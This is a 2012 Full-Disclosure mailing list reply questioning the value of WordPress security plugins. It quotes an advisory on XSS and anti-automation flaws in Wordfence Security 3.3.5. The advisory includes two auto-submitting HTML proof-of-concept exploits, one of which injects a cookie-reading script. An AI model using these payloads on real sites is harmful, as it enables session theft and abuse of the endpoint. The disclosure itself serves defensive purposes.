Hmm, Another 'security' plugin with vulnerabilities...
What exactly is the point of them? Even in an ideal world surely WP should be secure anyway - doesn't it just increase the attack surface? Philip Whitehouse On 19 Oct 2012, at 18:16, "MustLive" <[email protected]> wrote: > Hello list! > > I want to warn you about Cross-Site Scripting and Insufficient > Anti-automation vulnerabilities in Wordfence Security for WordPress. > > Wordfence - it's security plugin for WordPress. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are Wordfence Security 3.3.5 and previous versions. > > ---------- > Details: > ---------- > > XSS (WASC-08): > > Wordfence Security XSS.html > > <html> > <head> > <title>Wordfence Security XSS exploit (C) 2012 MustLive. > http://websecurity.com.ua</title> > </head> > <body onLoad="document.hack.submit()"> > <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post"> > <input type="hidden" name="email" > value="<script>alert(document.cookie)</script>"> > </form> > </body> > </html> > > Insufficient Anti-automation (WASC-21): > > Wordfence Security IAA.html > > <html> > <head> > <title>Wordfence Security IAA exploit (C) 2012 MustLive. > http://websecurity.com.ua</title> > </head> > <body onLoad="document.hack.submit()"> > <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post"> > <input type="hidden" name="email" value="[email protected]"> > </form> > </body> > </html> > > I've informed the plugin developer about vulnerabilities. And mentioned > about these vulnerabilities at my site (http://websecurity.com.ua/6106/). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
